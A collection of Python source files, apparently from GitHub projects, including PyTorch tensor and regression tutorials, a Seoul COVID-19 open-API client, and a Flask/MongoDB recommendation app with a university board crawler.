print(cat_result)
print(cat_result.size())
def tensor_randperm(self):
"""
randperm() 함수는 random permitation으로 임의의 어떤 수열, 순열에 대해서 만들어준다.
예를들어, 10이라고 인자를 주게 된다면, 0~9 숫자를 랜덤으로 섞인 텐서를 만들어준다.
심화) index_select()와 같이 사용하게 된다면, suffling이 가능해진다.
즉, 저번에 다루어보았던 indice에 randperm()의 랜덤 순열 텐서를 넣어주고 index_select()함수에 건내주면 셔플링이 이루어진다.
"""
result = torch.randperm(10)
print(result)
print(result.size())
def tensor_argmax(self):
"""
argmax()는 argument_max로, 가장 어떤 값의 최대를 만드는 index를 반환한다.
예를들어, torch.randperm(3**3).reshape(3, 3, -1)의 텐서를 만들었다.
즉, 랜덤 원소가 27개인 (3, 3, -1)의 텐서가 생성된다.
그리고 이를 argmax(dim=-1)을 수행하게 된다면,
-1 dimension이니 제일 마지막 차원 중에서 가장 큰 원소의 index를 반환한다.
"""
temp = torch.randperm(3**3).reshape(3, 3, -1)
print(temp)
print(temp.size())
result = temp.argmax(dim=-1)
print(result)
print(result.size())
def tensor_topk(self):
"""
topk()함수는 argmax()함수와 완전 똑같다.
하지만, 인덱스만 반환하지 않고 index + value의 형태로 반환해준다.
인자로는 k와 dim을 줄 수있다.
예를들어, x는 (3, 3, 3)이고 topk(x, k=1, dim=-1)일 경우,
dim=-1 마지막 차원에서, k=1 top 한 개만 반환해줘.
즉, (3, 3, 1)의 차원으로 반환이 된다.
여기서 마지막 1은 k와 같아야한다. 왜냐하면 k는 인자로 받은 값이기 때문에 항상 1이 아닐 수 있다.
우리는 앞으로, 마지막에 최대 값 1개를 뽑아야 할 상황이 많이 생긴다.
이때, argmax()나 topk() 둘 중 어떠한 것을 사용해도 상관은 없다.
여기서 기억할 점은 topk()는 차원이 살아있다. 만 기억하면 되겠다.
"""
values, indices = torch.topk(self.x, k=1, dim=-1)
print(values)
print(values.size())
print(indices)
print(indices.size())
print(values.squeeze(-1))
print(indices.squeeze(-1))
#########################
# 차원이 살아있다.
_, indices = torch.topk(self.x, k=2, dim=-1)
print(indices.size())
print(self.x.argmax(dim=-1) == indices[:, :, 0])
def tensor_sort(self):
"""
sort()는 말 그대로 정렬이다.
topk()로도 정렬을 구현할 수 있다.
예를들어,
target_dim = -1 이고,
topk(x, k=x.size(target_dim), largest=True) 수행하면
x에서 topk를 뽑을 건데, k가 해당 dimension의 size이다.
그럼. 현재 x는 (3, 3, 3)이고 이거의 -1 dimension은 마지막 차원이고, 이 차원의 사이즈는 3이다.
그러면 즉, 큰 순서대로 뽑아와라 라고 해석할 수 있다.
+@ 현재 Pytorch의 버그일 수 있는데,
CPU에서는 topk()방식이 빠르고,
GPU에서는 sort()방식이 빠르다고 한다..
- pytorch 1.6 버전까지는 확인됨.
"""
# topk() 방식
target_dim = -1
values, indices = torch.topk(self.x,
k=self.x.size(target_dim),
largest=True)
print(values)
print(indices)
# sort()로 topk()구하기
k = 1
values, indices = torch.sort(self.x, dim=-1, descending=True)
values, indices = values[:, :, :k], indices[:, :, :k]
print(values.squeeze(-1))
print(indices.squeeze(-1))
def tensor_masked_fill(self):
"""
masked_fill()함수는 말 그대로 masking이 된 곳에, 채워 넣어라. 라고 볼 수 있다.
예를들어, x = (3, 3)의 텐서가 존재한다.
그리고 (3, 3)텐서(행렬)에서 mask = x > 4를 수행하면,
broadcast가 수행되어서 같은 (3, 3)의 텐서에 위 조건에 맞게 True / False의 값들이 채워넣어진다.
그리고 이를 x.masked_fill(mask, value=-1)을 수행하면,
말 그대로 x텐서에서 mask가 True인 곳에 -1로 채워라 라고 해석할 수 있다.
즉, mask에 대하여 fill한다.
후에 자연어 처리에서 자주 사용하게 된다고 한다.
"""
tensor = torch.FloatTensor([i for i in range(3**2)]).reshape(3, -1)
print(tensor)
print(tensor.size())
mask = tensor > 4
print(mask)
result = tensor.masked_fill(mask, value=-1)
print(result)
def tensor_ones_zeros(self):
"""
ones()나 zeros() 함수는 말 그대로
특정 모양(크기)의 텐서의 값을 다 1 혹은 0으로 채워서 만들어주는 함수이다.
ones를 만들 건데, 이미 만들어진 텐서와 같은 타입과, 디바이스로 맞춰야할 때가 생긴다.
즉, 이미 존재하는 x라는 텐서와 같은 형태, 그리고 GPU는 GPU, CPU는 CPU에(디바이스에 따라 또 타입이 조금 다르다고한다.) 따라서 같은 형태로 만들어주어야 한다.
즉, 연산을 하기 위해서는 타입과 디바이스가 같아야 한다.
그래서 이미 존재하는 x에 맞는 연산을 해야하는 상황이 생길 경우에는 _like를 사용하면된다.
ones_like(x)
이렇게 되면, type과 디바이스도 같게 만들어진다.
+@ x텐서는 지금 GPU에 생성이 되어있는데, 새롭게 만든 ones텐서가 CPU에 생성이 되어있고 이 둘을 연산을 진행하게 된다면 오류가 발생한다고 한다.
"""
print(torch.ones(2, 3))
print(torch.zeros(2, 3))
print(torch.ones_like(self.x))
print(torch.zeros_like(self.x))
if __name__ == "__main__":
test = TensorFuncions()
test.tensor_ones_zeros()
```
#### File: wikidocs/2_linear_regression/custom_dataset.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import TensorDataset # 텐서데이터셋
from torch.utils.data import DataLoader # 데이터로더
'''
PyTorch provides torch.utils.data.Dataset and torch.utils.data.DataLoader to make datasets easier to handle.
With them, mini-batch training, data shuffling, and parallel loading can all be done simply.
Sometimes, however, you subclass torch.utils.data.Dataset to build a custom dataset directly.
torch.utils.data.Dataset is the abstract class PyTorch provides for supplying datasets.
'''
torch.manual_seed(1)
class CustomDataset(torch.utils.data.Dataset):
def __init__(self):
        # Preprocess / define the dataset here
self.x_data = torch.FloatTensor([[73, 80, 75],
[93, 88, 93],
[89, 91, 90],
[96, 98, 100],
[73, 66, 70]])
self.y_data = torch.FloatTensor([[152], [185], [180], [196], [142]])
def __len__(self):
        # Length of the dataset, i.e. the total number of samples
return len(self.x_data)
def __getitem__(self, idx):
        # Fetch a single sample from the dataset
x = torch.FloatTensor(self.x_data[idx])
y = torch.FloatTensor(self.y_data[idx])
return x, y
dataset = CustomDataset()
dataloader = DataLoader(dataset, batch_size=2, shuffle=True)
model = nn.Linear(3, 1)
optimizer = torch.optim.SGD(model.parameters(), lr=1e-5)
epochs = 20
for epoch in range(epochs):
for batch_idx, samples in enumerate(dataloader):
x_train, y_train = samples
prediction = model(x_train)
cost = F.mse_loss(prediction, y_train)
optimizer.zero_grad()
cost.backward()
optimizer.step()
print("Epoch {:4d}/{} Batch {}/{} Cost: {:.6f}".format(epoch, epochs, batch_idx + 1, len(dataloader), cost.item()))
```
#### File: wikidocs/3_logistic_Regression/logistic_regression.py
```python
import numpy as np
import matplotlib.pyplot as plt
def sigmoid(x):
    return 1/(1+np.exp(-x))
# Graph with W = 1 and b = 0
x = np.arange(-5.0, 5.0, 0.1)
y = sigmoid(x)
plt.plot(x, y, 'g')
plt.plot([0,0],[1.0,0.0], ':') # add a dotted line through the centre
plt.title('Sigmoid Function')
plt.show()
'''
The graph above shows that the sigmoid function squashes its output into values between 0 and 1.
'''
# How the slope changes as W changes
x = np.arange(-5.0, 5.0, 0.1)
y1 = sigmoid(0.5*x)
y2 = sigmoid(x)
y3 = sigmoid(2*x)
plt.plot(x, y1, 'r', linestyle='--') # when W is 0.5
plt.plot(x, y2, 'g') # when W is 1
plt.plot(x, y3, 'b', linestyle='--') # when W is 2
plt.plot([0,0],[1.0,0.0], ':') # add a dotted line through the centre
plt.title('Sigmoid Function')
plt.show()
'''
Looking closely, the slope of the graph changes with the value of W.
In linear regression the weight W meant the slope of a straight line; here it determines the steepness of the curve.
The larger W becomes, the steeper the curve; the smaller W, the flatter it gets.
'''
# How the curve shifts left/right as b changes
x = np.arange(-5.0, 5.0, 0.1)
y1 = sigmoid(x+0.5)
y2 = sigmoid(x+1)
y3 = sigmoid(x+1.5)
plt.plot(x, y1, 'r', linestyle='--') # x + 0.5
plt.plot(x, y2, 'g') # x + 1
plt.plot(x, y3, 'b', linestyle='--') # x + 1.5
plt.plot([0,0],[1.0,0.0], ':') # add a dotted line through the centre
plt.title('Sigmoid Function')
plt.show()
# =========================================================================
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
torch.manual_seed(1)
# declare x_train and y_train as tensors
x_data = [[1, 2], [2, 3], [3, 1], [4, 3], [5, 3], [6, 2]]
y_data = [[0], [0], [0], [1], [1], [1]]
x_train = torch.FloatTensor(x_data)
y_train = torch.FloatTensor(y_data)
# initialise the model parameters
W = torch.zeros((2, 1), requires_grad=True)
b = torch.zeros(1, requires_grad=True)
# configure the optimizer
optimizer = optim.SGD([W, b], lr=1)
epochs = 1000
for epoch in range(epochs + 1):
    # compute the cost (binary cross-entropy)
hypothesis = torch.sigmoid(x_train.matmul(W) + b)
cost = -(y_train * torch.log(hypothesis) +
(1 - y_train) * torch.log(1 - hypothesis)).mean()
    # improve H(x) using the cost
optimizer.zero_grad()
cost.backward()
optimizer.step()
    # print a log every 100 epochs
if epoch % 100 == 0:
print('Epoch {:4d}/{} Cost: {:.6f}'.format(epoch, epochs, cost.item()))
``` |
{
"source": "837477/RTCS",
"score": 2
} |
#### File: app/controller/local_status.py
```python
import requests
import datetime
from dependencies import Config
from model.mongodb.local_status import LocalStatus
def get_api_data(auth_key):
url = "http://openAPI.seoul.go.kr:8088/{}/json/TbCorona19CountStatusJCG/1/1/".format(auth_key)
return requests.get(url).json()
def get_all_local_status(db):
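    # Cache-first flow: return today's cached document if present; otherwise hit
    # the Seoul open-data API once and upsert the response for later calls.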
today = datetime.date.today().strftime('%Y.%m.%d.00')
result = LocalStatus(db).get_local_status(today)
if not result:
api_data = get_api_data(Config.API_SECRET_KEY)
result = api_data['TbCorona19CountStatusJCG']['row'][0]
LocalStatus(db).upsert_local_status(result)
return result
```
#### File: app/controller/patient.py
```python
import requests
import datetime
from dependencies import Config
from model.mongodb.patients import Patients
def get_api_data_infected_persons(auth_key):
url = "http://openAPI.seoul.go.kr:8088/{}/json/Corona19Status/1/30/".format(auth_key)
return requests.get(url).json()
def get_api_data_patients(auth_key):
url = "http://openAPI.seoul.go.kr:8088/{}/json/TbCorona19CountStatus/1/1/".format(auth_key)
return requests.get(url).json()
def get_infected_persons():
api_data = get_api_data_infected_persons(Config.API_SECRET_KEY)
result = api_data['Corona19Status']['row']
return result
def get_patients(db):
today = datetime.date.today().strftime('%Y.%m.%d.00')
result = Patients(db).get_patient(today)
if not result:
try:
api_data = get_api_data_patients(Config.API_SECRET_KEY)
result = api_data['TbCorona19CountStatus']['row'][0]
Patients(db).upsert_patient(result)
except:
result = Patients(db).get_patient_recent()
return result
``` |
{
"source": "837477/SIGNUS",
"score": 2
} |
#### File: api/signus_v1/post.py
```python
from flask import g
from app.api.signus_v1 import signus_v1 as api
from app.api.decorators import timer, login_required, login_optional
from app.controllers.post import (post_like,
post_unlike,
post_view)
@api.route("/post/like/<string:post_oid>", methods=["PATCH"])
@timer
@login_required
def signus_v1_post_like(post_oid):
''' 게시글 좋아요 '''
return {
"msg": "success",
"result": post_like(g.mongo_cur,
post_oid,
g.user)
}
@api.route("/post/unlike/<string:post_oid>", methods=["PATCH"])
@timer
@login_required
def signus_v1_post_unlike(post_oid):
''' 게시글 좋아요 취소 '''
return {
"msg": "success",
"result": post_unlike(g.mongo_cur,
post_oid,
g.user)
}
@api.route("/post/view/<string:post_oid>", methods=["PATCH"])
@timer
@login_optional
def signus_v1_post_view(post_oid):
''' 게시글 조회수 '''
if 'user' in g:
result = post_view(g.mongo_cur, post_oid, g.user)
else:
result = post_view(g.mongo_cur, post_oid)
return {
"msg": "success",
"result": result
}
```
#### File: models/mongodb/user.py
```python
from flask import current_app
from bson.objectid import ObjectId
class User:
"""SIGNUS DB user Model"""
def __init__(self, client):
self.col = client[current_app.config['MONGODB_DB_NAME']]['user']
def insert_one(self, user_obj):
        ''' Insert a user '''
self.col.insert_one(user_obj)
return True
def find_one(self, user_id, projection=None):
        ''' Return a specific user '''
return self.col.find_one(
{"user_id": user_id},
projection
)
def find_many(self, projection=None):
        ''' Return all users '''
return list(self.col.find(
{},
projection
))
def find_gt_updated_at(self, updated_time, projection=None):
        ''' Return users updated after updated_time
            (the time interest was last measured) '''
return list(self.col.find(
{"updated_at": {"$gt": updated_time}},
projection
))
def check_fav(self, user_id, post_oid):
        ''' Check whether the user has liked the post '''
return self.col.find_one(
{"user_id": user_id},
{
"fav_list":
{
"$elemMatch":
{
'_id': post_oid
}
}
}
)
def update_one(self, user_id, update_object):
        ''' Update a specific user's information '''
self.col.update_one(
{"user_id": user_id},
{"$set": update_object}
)
return True
def update_list_column_push(self, user_id, _type, _object):
        ''' Push an entry onto a list column (fav/view_list) '''
self.col.update_one(
{"user_id": user_id},
{
"$push":
{
_type: {"$each": [_object], "$position": 0}
}
}
)
return True
def update_list_column_pull(self, user_id, _type, oid):
        ''' Pull (remove) an entry from a list column (fav/view_list) '''
self.col.update_one(
{"user_id": user_id},
{
"$pull":
{
_type: {"_id": str(oid)}
}
}
)
return True
def update_list_pull(self, user_id, _type, push_object):
        ''' Pull an entry from a list column '''
self.col.update_one(
{"user_id": user_id},
{
"$pull":
{
_type: {"_id": [push_object], "$position": 0}
}
}
)
return True
def delete_one(self, user_id):
        ''' Delete a specific user '''
self.col.delete_one({'user_id': user_id})
return True
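# Hedged usage sketch (illustrative; assumes an open pymongo client and a Flask
# application context, since the collection name is read from current_app.config):
#   user_model = User(mongo_client)
#   user_model.insert_one({"user_id": "alice", "fav_list": [], "view_list": []})
#   doc = user_model.find_one("alice", {"_id": 0, "user_id": 1})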
```
#### File: background/src/interest.py
```python
from tqdm import tqdm
from datetime import datetime
def interest(db, config):
renewal_time = db['master_config'].find_one({"key": "updated_at"})['value']
target_users = list(db['user'].find({'updated_at':{'$gt': renewal_time}}))
categories = list(db['category'].find())
now_date = datetime.now()
for user in tqdm(target_users):
if not user['fav_list'] and not user['view_list']:
continue
        # exception: skip test accounts
if user['user_id'] in ["test1", "test2", "test3"]:
continue
        # keep only the 400 most recent entries (anything older is judged not to affect interest)
user['fav_list'] = user['fav_list'][:400]
user['view_list'] = user['view_list'][:400]
user['search_list'] = user['search_list'][:400]
# user['newsfeed_list'] = user['newsfeed_list'][:400]
fav_token = []
view_token = []
search_keywords = []
for fav in user['fav_list']:
fav_token += fav['token']
for view in user['view_list']:
view_token += view['token']
for search in user['search_list']:
search_keywords += search['keyword_tokens']
        # combine the weighted token lists
assemble_doc = fav_token * config.INDICATORS["FAV_WEIGHT"] +\
view_token * config.INDICATORS["VIEW_WEIGHT"] +\
search_keywords * config.INDICATORS["SEARCH_WEIGHT"]
        # compute the topic vector
topic_vector = config.FT.doc2vec(assemble_doc).tolist()
        # refresh the user's cold point
cold_point = len(user['fav_list']) +\
len(user['view_list']) +\
len(user['search_list'])
        # update the user document
db['user'].update_one(
{'user_id': user['user_id']},
{
'$set':
{
'fav_list': user['fav_list'],
'view_list': user['view_list'],
'search_list': user['search_list'],
'topic_vector': topic_vector,
'cold_point': cold_point,
'updated_at': now_date
}
}
)
db['master_config'].update_one({"key": "updated_at"}, {"$set": {"value": now_date}})
return len(target_users)
# exception-case variant of interest() (same logic, without the test-account exclusion)
def interest_temp(db, config):
renewal_time = db['master_config'].find_one({"key": "updated_at"})['value']
target_users = list(db['user'].find({'updated_at':{'$gt': renewal_time}}))
categories = list(db['category'].find())
now_date = datetime.now()
for user in tqdm(target_users):
if not user['fav_list'] and not user['view_list']:
continue
# 최근 400개 까지만 보존. (400개 이후는 관심도에 영향을 미치지 않다고 판단.)
user['fav_list'] = user['fav_list'][:400]
user['view_list'] = user['view_list'][:400]
user['search_list'] = user['search_list'][:400]
# user['newsfeed_list'] = user['newsfeed_list'][:400]
fav_token = []
view_token = []
search_keywords = []
for fav in user['fav_list']:
fav_token += fav['token']
for view in user['view_list']:
view_token += view['token']
for search in user['search_list']:
search_keywords += search['keyword_tokens']
# 취합
assemble_doc = fav_token * config.INDICATORS["FAV_WEIGHT"] +\
view_token * config.INDICATORS["VIEW_WEIGHT"] +\
search_keywords * config.INDICATORS["SEARCH_WEIGHT"]
# 토픽 벡터 구하기
topic_vector = config.FT.doc2vec(assemble_doc).tolist()
# 사용자 Cold Point 갱신
cold_point = len(user['fav_list']) +\
len(user['view_list']) +\
len(user['search_list'])
# 사용자 갱신
db['user'].update_one(
{'user_id': user['user_id']},
{
'$set':
{
'fav_list': user['fav_list'],
'view_list': user['view_list'],
'search_list': user['search_list'],
'topic_vector': topic_vector,
'cold_point': cold_point,
'updated_at': now_date
}
}
)
db['master_config'].update_one({"key": "updated_at"}, {"$set": {"value": now_date}})
return len(target_users)
```
#### File: modules/crawler/crawling_select.py
```python
from bs4 import BeautifulSoup
from modules.crawler.etc.url_parser import URLparser
from modules.crawler.etc.url_parser import URLparser_EUCKR
from modules.crawler.etc.url_parser import URLparser_UTF8
from modules.crawler.dbs.mongo.db_manager import db_manager
from modules.crawler.dbs.mongo.db_manager import get_lastly_post
from modules.crawler.dbs.mongo.db_manager import push_lastly_post
from modules.crawler.dbs.mongo.db_health import is_crawling
from modules.crawler.list.date_cut import date_cut
from modules.crawler.etc.error_handler import error_handler
from modules.crawler.etc.error_handler import continue_handler
import time
from modules.crawler.sj_crawling import sj1, sj2, sj3, sj4, sj5, sj6, sj7, sj8, sj9,\
sj10, sj11, sj12, sj13, sj14, sj15, sj16, sj17, sj18,\
sj19, sj20, sj21, sj23, sj24, sig25, sig26, sig27, sig28,\
sj29, sj30, sj31, sj32, sj33, sj34, sig35, sig36, sig37,\
sj38, sig39, sj40, sj41, sj42, sig43, sj44,\
sig45, sig46, sig47, sig48, sig50, sig51, sig52, sig53, sig54,\
sig55, sig56, sig57
def Crawling(URL, db):
driver = None
info_name = URL['info'].split('_')
    crawling_name = info_name[0] # select which board-specific crawler module to use
    page = 1
    main_url = URL['url'] # base board url, used when switching pages
    page_url = eval(crawling_name + '.Change_page(main_url, page)') # url of the post list for the current page
    end_date = date_cut(URL['info']) # cut-off date for this board
    if crawling_name in ["sj4","sj19","sj20","sj30","sj34","sig56"]: # excluded boards
        return
    # print the info of the board currently being crawled
    print("Target : ", URL['info'])
    continue_handler(URL['info'], URL, page_url)
    # decide whether this board should be crawled at all
    if is_crawling(db, URL['info']) == False:
return
while True:
if crawling_name in ["sj10", "sj11","sj13"]: #추후에 보수 후에 사전으로 각 함수 실행하기
eval(crawling_name + '.init(URL, end_date, db)')
break
if crawling_name in ["sj23", "sig26", "sig27", "sig28", "sj44", "sig50", "sig51","sig55","sig56","sig57"]:
lastly_post = get_lastly_post(URL, db)
print("lastly_post : ",lastly_post)
try:
print("\npage_url :::: ", page_url) #현재 url 출력
print("Page : ", page) #현재 페이지 출력
#driver_page 생성---------------------------
# if crawling_name in ['sj10']:
# driver_page = URLparser_EUCKR(page_url)
if crawling_name in ['sj12']:
driver_page = URLparser_UTF8(page_url)
else:
driver_page = URLparser(page_url)
#-------------------------------------------
#Selenium을 쓰는 경우----------------------------------------------------------------------------------------------
if crawling_name in ["sj23", "sig26", "sig27", "sig28", "sj29", "sj38", "sj44", "sig50", "sig51", "sig52","sig55","sig56","sig57"]:
data = eval(crawling_name + '.Parsing_list_url(URL, page_url, driver)')
driver = data[0]
post_urls = data[1]
# elif crawling_name in ["sj30"]:#---------------------------세종대역 예외처리
# data = eval(crawling_name + '.Parsing_list_url(URL, page_url, lastly_post, db, driver)')
# driver = data[0]
# post_urls = data[1]
#Requests를 쓰는 경우----------------------------------------------------------------------------------------------
else:
#로그인을 하는 경우-------------------------------------------------------------------------------
if URL['login'] == 1:
post_urls = eval(crawling_name + '.Parsing_list_url(URL, page_url)')
#로그인을 하지않는 경우---------------------------------------------------------------------------
else:
if driver_page is None: #Connect Failed 이면 break
error_handler("driver_none", URL, page_url, db)
break
else:
#parsing 형태--------------------------------------------------
# if crawling_name in ['sj10']:
# bs_page = BeautifulSoup(driver_page, 'lxml')
# else:
bs_page = BeautifulSoup(driver_page, 'html.parser')
#--------------------------------------------------------------
#20대연구소 예외
if crawling_name == "sig47":
pageidx = page_url.split('=')[1]
post_urls = eval(crawling_name + '.Parsing_list_url(URL, bs_page, pageidx)')
#네이버 뉴스기사
elif crawling_name == "sig54":
post_urls = eval(crawling_name + '.Parsing_list_url(URL, page_url)')
else:
post_urls = eval(crawling_name + '.Parsing_list_url(URL, bs_page)')
#-----------------------------------------------------------------------------------------------
#-----------------------------------------------------------------------------------------------------------------
            # get_post_data format: [post-info dictionary, title, date] --------------------------------------------------------------------------------------------------
            # the date format is "0000-00-00 00:00:00"
post_data_prepare = []
for post_url in post_urls:
#Selenium인 경우--------------------------------------------------------------------------------------------------------------------
#------------------게시판 규격인 경우
if crawling_name in ['sj29', 'sig52']:
try:
get_post_data = eval(crawling_name + '.Parsing_post_data(driver, post_url, URL)')
except:
try:
get_post_data = eval(crawling_name + '.Parsing_post_data(driver, post_url, URL)')
except:
continue
#----------------게시판 규격이 아닌 경우
elif crawling_name in ['sj23', 'sig26', 'sig27', 'sig28', 'sj44', 'sig50', 'sig51',"sig55","sig56","sig57"]:
try:
data = eval(crawling_name + '.Parsing_post_data(driver, post_url, URL, lastly_post)')
except:
try:
data = eval(crawling_name + '.Parsing_post_data(driver, post_url, URL, lastly_post)')
except Exception as e:
print(e)
except:
continue
# data = eval(crawling_name + '.Parsing_post_data(driver, post_url, URL, lastly_post)')
post_data_prepare = data[0]
lastly_post = data[1]
if lastly_post is None:
pass
else:
push_lastly_post(URL, lastly_post, db)
#Requests인 경우--------------------------------------------------------------------------------------------------------------------
else:
#driver_post 생성--------------------------------
if crawling_name in ["sj21", "sj4", "sj5", "sj8", "sj16"]: #---driver_post가 필요없는 경우
pass
elif crawling_name in ['sj33']:
driver_post = URLparser_EUCKR(post_url)
elif crawling_name in ['sj12']:
driver_post = URLparser_UTF8(post_url)
else:
driver_post = URLparser(post_url)
#------------------------------------------------
#-----------------------------------------------------------------------------------------------위키백과 구조
if crawling_name in ['sj21']:
try:
get_post_data = eval(crawling_name + '.Parsing_post_data(post_url, URL)')
except:
try:
get_post_data = eval(crawling_name + '.Parsing_post_data(post_url, URL)')
except:
continue
#-----------------------------------------------------------------------------------------------게시판 규격이 아닌 구조
elif crawling_name in ["sj4", "sj5", "sj8", "sj16"]:
try:
post_data_prepare = eval(crawling_name + '.Parsing_post_data(post_url, URL)')
except:
try:
post_data_prepare = eval(crawling_name + '.Parsing_post_data(post_url, URL)')
except:
continue
break
#-----------------------------------------------------------------------------------------------게시판 규격인 구조
else:
if driver_post is None: #Connect Failed 이면 continue
error_handler("driver_none", URL, page_url, db)
break
else:
#parsing 형태-------------------------------------------
# if crawling_name in ['sj10']:
# bs_post = BeautifulSoup(driver_post, 'lxml')
# elif crawling_name in ['sj12']:
if crawling_name in ['sj12']:
bs_post = driver_post
else:
bs_post = BeautifulSoup(driver_post, 'html.parser')
#-------------------------------------------------------
try:
get_post_data = eval(crawling_name + '.Parsing_post_data(bs_post, post_url, URL)')
except:
try:
get_post_data = eval(crawling_name + '.Parsing_post_data(bs_post, post_url, URL)')
except:
continue
#-----------------------------------------------------------------------------------------------------------------------------------
#post_data_prepare이 이미 완성된 경우-----------------------------------------------------------------------
if crawling_name in ["sj4", "sj5", "sj8", "sj16", "sj23", "sig26", "sig27", "sig28", "sj44", "sig50", "sig51","sig55","sig56","sig57"]:
pass
#post_data_prepare이 완성되지 않은 경우---------------------------------------------------------------------
# 네이버 뉴스 기사
elif crawling_name == "sig54":
if get_post_data == None: #잘못된 포스트 데이터인 경우
continue
for item in get_post_data:
date = item["date"]
#게시물의 날짜가 end_date 보다 옛날 글이면 continue, 최신 글이면 append
if str(date) <= end_date:
continue
else:
post_data_prepare.append(item)
else:
if get_post_data == None: #잘못된 포스트 데이터인 경우
continue
title = get_post_data[1]
date = get_post_data[2]
print(date, "::::", title) #현재 크롤링한 포스트의 date, title 출력
#게시물의 날짜가 end_date 보다 옛날 글이면 continue, 최신 글이면 append
if str(date) <= end_date:
continue
else:
post_data_prepare.append(get_post_data[0])
#----------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------------------------------------------------------------
add_cnt = db_manager(URL, post_data_prepare, db)
print("add_OK : ", add_cnt) #DB에 저장된 게시글 수 출력
#dirver 종료 [Selenium 을 사용했을 시]
if crawling_name in ["sj23", "sig26", "sig27", "sig28", "sj29", "sj38", "sj44", "sig50", "sig51", "sig52","sig55","sig56","sig57"]:
driver.quit()
            # if no posts were added to the DB, break; otherwise go to the next page
if add_cnt == 0:
break
else:
page += 1
page_url = eval(crawling_name + '.Change_page(main_url, page)')
        # Error handler: if crawling fails, log the error and stop crawling this board.
except Exception as e:
error_handler(e, URL, page_url, db)
break
```
#### File: dbs/mongo/db_crawler.py
```python
from modules.crawler.list.url_list import List
from pymongo import MongoClient
from datetime import datetime
from bson.objectid import ObjectId
def init_crawler_collection(db):
#존재유무 파악
collist = db.list_collection_names()
if 'crawler_manager' in collist:
print(":::: crawler_manager ALREADY EXISTS! ::::")
return
else:
db["crawler_manager"]
info_list = [] # all
info_hidden_list = [] # everytime etc..
for component in List:
info_list.append(component['info'])
info_list.remove('sj34_everytime_all')
info_hidden_list.append('sj34_everytime_all')
info_hidden_list.append('sig57_campuspick_study')
query = {
"is_crawling": False,
"started_at": datetime.now(),
"ended_at": datetime.now()
}
db.crawler_manager.insert_one(query)
for hour in range(24):
if hour == 0:
post_info_list = info_list + info_hidden_list
else:
post_info_list = info_list
query = {
"hour": hour,
"post_info": post_info_list
}
db.crawler_manager.insert_one(query)
print(":::: crawler_manager CREATE Complete! ::::")
def get_crawler_manager(db):
data = db.crawler_manager.find_one({"is_crawling": {"$exists": True}})
return data
def get_crawler_timeinfo(db):
now_hour = datetime.strftime(datetime.now(), "%H")
data = db.crawler_manager.find_one({"hour": int(now_hour)})
return data['post_info']
def update_crawler_manager(db, data):
db.crawler_manager.update_one({"_id": ObjectId(data["_id"])}, {"$set": data})
def Can_crawling(db):
data = get_crawler_manager(db)
if data['is_crawling']:
return False
return True
```
#### File: dbs/mongo/info_id.py
```python
from pymongo import MongoClient
from modules.crawler.list.url_list import List
def post_info(db):
#soojle 라는 데이터베이스에 접근
#존재유무 파악
collist = db.list_collection_names()
if 'post_info' in collist:
print(":::: post_info ALREADY EXISTS! ::::")
return
    # info_id : identifier shown in the board table of the DB
    collection = db["post_info"]
    # insert info_id : sj_domain, title_tag : 도메인, login : 0  ==> example record
collection.insert_one({"info_id": "sj_domain", "title_tag": "도메인/", "info_num": 0})
print(":::: post_info CREATE Complete! ::::")
    # insert each board's info, title_tag and login values from url_list into the post_info collection
    # login indicates whether authentication is required
cnt = 1
for URL in List:
query = {
"info_id": URL['info'],
"info_num": cnt,
"url": URL['url'],
"info": URL['info'],
"title_tag": URL['title_tag'],
"login": URL['login'],
"crawling": True,
"stay_guideline": 0,
"stay_cnt": 0
}
if "post_url" in URL:
query["post_url"] = URL['post_url']
collection.insert_one(query)
cnt+=1
print(":::: post_info INSERT Complete! ::::")
    # create the recent_post collection that stores the latest post per board
collection = db["recent_post"]
if collection.find().count() == 0:
for URL in List:
collection.insert_one({"info_id": URL['info'], "title": 0})
print(":::: recent_post CREATE Complete! ::::")
```
#### File: crawler/etc/driver_agent.py
```python
from selenium import webdriver
from platform import platform
import os
# def chromedriver():
# options = webdriver.ChromeOptions()
# options.add_argument('headless')
# options.add_argument('window-size=1920x1080')
# options.add_argument("disable-gpu")
# options.add_argument("user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5)AppleWebKit 537.36 (KHTML, like Gecko) Chrome")
# options.add_argument("lang=ko_KR")
# path = os.getenv("SIGNUS_CHROMEDRIVER_PATH")
# if platform().startswith("Windows"):
# driver = webdriver.Chrome('../chromedriver.exe', options=options)
# else:
# driver = webdriver.Chrome(path, options=options)
# return driver
def chromedriver():
path = os.getenv("SIGNUS_CHROMEDRIVER_PATH")
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--disable-dev-shm-usage')
chrome_options.add_argument("--ignore-ssl-errors=true")
chrome_options.add_argument("--ssl-protocol=any")
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_argument("user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5)AppleWebKit 537.36 (KHTML, like Gecko) Chrome")
driver = webdriver.Chrome(executable_path=path,options=chrome_options)
return driver
```
#### File: crawler/etc/error_handler.py
```python
from modules.crawler.dbs.mongo.db_health import url_health_check
from datetime import datetime
import time
from platform import platform
import os
def error_logging(e, URL, page_url, db):
log_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
log_info = URL['info']
log_url = page_url
print("[ERROR]=====================================================================")
print(log_time, " :: ", log_info, "\nURL :: ", log_url)
print(type(e), "\n", e, "\n\n\n\n")
f = open(os.getenv("SIGNUS_CRAWLER_ERROR_LOG_PATH"),'a')
f_data = "[ERROR]=====================================================================\n"
f_data = f_data + log_time + " :: " + log_info + "\nURL :: " + log_url + "\n"
f_data = f_data + str(type(e)) + "\n" + str(e) + "\n\n"
f.write(f_data)
f.close()
time.sleep(2)
def error_handler(e, URL, page_url, db):
    # temporarily suspend crawling of this site for the next 5 runs
url_health_check(URL['url'], db)
error_logging(e, URL, page_url, db)
def continue_handler(target, URL, page_url):
log_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
log_info = URL['info']
log_url = page_url
f = open(os.getenv("SIGNUS_CRAWLER_LOG_PATH"),'a')
f_data = "[Continue]==================================================================\n"
f_data = f_data + log_time + " :: " + log_info + "\nURL :: " + log_url + "\n"
f_data = f_data + "Now Crawling :: " + target + "\n\n\n\n"
f.write(f_data)
